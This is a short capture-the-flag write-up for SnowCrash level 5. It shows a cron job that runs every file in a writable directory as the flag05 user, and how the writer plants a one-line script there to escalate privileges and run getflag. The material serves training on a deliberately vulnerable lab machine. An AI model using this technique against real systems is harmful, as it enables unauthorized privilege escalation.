# Level05

- Here we get a cron task in the mails:
	```bash
	level05@SnowCrash:~$ cat /var/mail/level05
	*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
	```
- The script executed by the task:
	```bash
	level05@SnowCrash:~$ find / -user flag05 2>/dev/null
	/usr/sbin/openarenaserver
	[...]
	```
- In this file we got some unconditional execution.
	And it updates every 2 minutes.
	```bash
	level05@SnowCrash:~$ cat /usr/sbin/openarenaserver
	#!/bin/sh

	for i in /opt/openarenaserver/* ; do
		(ulimit -t 5; bash -x "$i")
		rm -f "$i"
	done
	```
- So we create a script in the `/opt/openarenaserver/` directory and bam we get
	our flag in 2 minutes tops.
	```bash
	echo "/bin/getflag > /dev/shm/flag05" > /opt/openarenaserver/exploit
	```
